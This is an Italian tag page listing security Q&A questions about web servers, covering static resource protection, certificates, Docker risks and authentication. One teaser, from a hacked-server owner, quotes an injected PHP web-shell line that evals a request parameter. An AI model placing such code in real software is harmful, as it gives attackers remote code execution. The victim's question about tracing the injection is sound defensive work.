Domande con tag 'webserver'

domande con tag
1
risposta

Protezione delle risorse statiche del sito Web

Se ho un sito web accessibile solo tramite autenticazione in una pagina di accesso, è possibile che una persona non autenticata abbia accesso alle risorse statiche (immagini, css, javascript, ...)? Immagino che l'unico modo in cui potrebbero...
posta 14.08.2013 - 21:16
2
risposte

Quali sono i problemi di sicurezza nell'esporre la home page del server predefinito in Internet pubblica?

Ho visto su internet dove diverse aziende di siti Web hanno esposto la home page predefinita di server Web come Tomcat, NGNIX, server web Apache. Credo sempre che non sia la prassi migliore per esporre la pagina web server predefinita. Ma ora un...
posta 20.09.2018 - 07:20
1
risposta

I download di Aria2 sono rilevabili dai server web?

Un paio di mesi fa mi sono iscritto a un corso online a pagamento. I loro termini di servizio indicano che queste lezioni video sono per la visualizzazione in streaming e non devono essere scaricate. Ci sono due ore di tragitto da casa mia al la...
posta 05.05.2018 - 15:01
1
risposta

Nome comune del certificato client? Soggetto nome alternativo?

Per un progetto IoT, voglio proteggere la comunicazione del server client. Voglio che sia il server (Apache) che i client si identificano / si autenticano a vicenda (un client non comunica con altri client) prima che i client possano pubblicare...
posta 03.09.2018 - 22:09
1
risposta

Inbound Ip Ha visitato stack wordpress "localhost" su AWS

Sto testando un server web su un'istanza di aws EC2, ha uno stack wordpress su di esso. Il dominio è configurato correttamente, public static (elastico ip) reindirizzato al dominio principale così come il dominio pubblico di aws. Quindi il sito...
posta 10.02.2018 - 14:07
1
risposta

Nuovi file che appaiono sul mio server web (non ho creato)

Recentemente ho registrato un keylogger sul mio computer che registra nomi utente e password, compresi i rispettivi indirizzi web. Ho cambiato tutte le mie password però sul mio account di web hosting, nell'FTP ci sono numerose copie dello stess...
posta 15.10.2017 - 00:40
3
risposte

Come posso determinare da dove proviene lo script iniettato?

Ho un server che al momento è stato violato. I file vengono creati sul mio server con contenuti di questo tipo: if(isset($_REQUEST['oUS'])){/*PJEG*/eval($_REQUEST['oUS']);/*z*/exit;/*Lv*/} O come questo: <?php /*auV*/if/*fpFF*/(i...
posta 20.07.2017 - 13:25
1
risposta

Rischi potenziali associati all'utilizzo di Docker nei server di produzione

Quali sono i aggiunti rischi per la sicurezza dell'utilizzo di un contenitore dockerizzato per la distribuzione di un server di produzione? Non sono interessato a rischi che esisterebbero comunque nell'implementazione di un server di produz...
posta 07.09.2017 - 10:15
1
risposta

Come memorizzare in modo sicuro la chiave privata di CA openssl [duplicato]

Siamo nella fase di implementazione dei certificati SSL per l'accesso all'interfaccia utente ai nostri componenti (abbiamo una CA radice interna a cui inviamo il CSR generato in openSSL) e ci chiediamo dove sarebbe il posto migliore per archiv...
posta 23.08.2017 - 14:44
1
risposta

Alternative all'autenticazione di base e digest in HTTP quando le risorse sono vincolate

Attualmente sto implementando un piccolo server web su una piattaforma embedded che è piuttosto vincolata alle risorse. Sto pianificando di utilizzare la comunicazione non protetta perché TLS potrebbe non essere possibile nel mio ambiente embedd...
posta 04.07.2017 - 09:52